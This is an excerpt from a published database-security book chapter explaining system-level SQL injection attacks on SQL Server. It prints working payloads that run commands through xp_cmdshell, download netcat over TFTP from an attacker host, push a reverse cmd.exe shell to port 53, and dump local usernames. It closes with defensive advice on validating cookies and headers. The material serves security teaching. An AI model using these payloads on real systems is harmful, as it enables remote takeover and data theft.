The following excerpt, courtesy of Wiley Publishing, is from Chapter 22 of the book "The Database Hacker's Handbook: Defending Database Servers" written by David Litchfield, Chris Anley, John Heasman and Bill Grindlay. Click for the complete book excerpt series or purchase the book.
System level attacks
If the vulnerable application is connecting to the database with system administrator privileges, attacks can be launched on the operating system itself.Commands can be executed using xp_cmdshell:
'; exec master..xp_cmdshell 'dir > C:dir.txt' —
Requesting a DNS lookup of the attacker's machine (the non-routable 192.168.0.1 in this example) verifies that commands are executed; DNS queries on TCP port 53 are often allowed out through corporate firewalls:
'; exec master..xp_cmdshell 'nslookup foobar 192.168.0.1' —
Running a packet sniffer such as Ethereal, a DNS query arrives containing the internal IP address of the database server. If permitted by the SQL Server's firewall the attacker may attempt to gain a remote shell by instructing the server to download the network tool netcat from a TFTP (trivial file transfer protocol) server running on his machine:
'; exec master..xp_cmdshell 'tftp –I 192.168.0.1 GET nc.exe c:nc.exe' —
A command shell can now be pushed out to the attacker's netcat listener on port 53:
'; exec master..xp_cmdshell 'C:nc.exe 192.168.0.1 53 –e cmd.exe' —
The usual technique for viewing command-line responses is to insert the information into a temporary table and then retrieve it using the previously detailed approaches, either through error message information or by using time delays. The local Windows usernames on the server can be exported using
'; create table test(num int identity(1,1), data(4096)); insert into test exec xp_cmdshell 'cmd /c net user' —
The usernames can then be viewed line by line using
' or 1 in (select data from test where num = 1)-- ' or 1 in (select data from test where num = 2)-- ' or 1 in (select data from test where num = 3)-- etc...
Alternative Attack Vectors
SQL injection can also occur if an application takes a value such as a session identifier from a user-supplied cookie. Care should be taken that equally stringent input validation is applied to values received from cookies, as is applied to those from form fields and URL query strings.
Web applications can extract information from many different sources, such as the HTTP request headers (Accept, User-Agent, Host, and so on) provided by web browsers when connecting to a server. These are often written to a database in order to generate user statistics, such as the prevalence of certain browsers or operating systems, and could open up a web application to SQL injection if incorrectly handled.
Both filenames and registry keys and their values may be utilized by a web application to form queries, and should also be audited for SQL injection.
Click for the next excerpt in this series: Time delays
Click for the complete book excerpt series.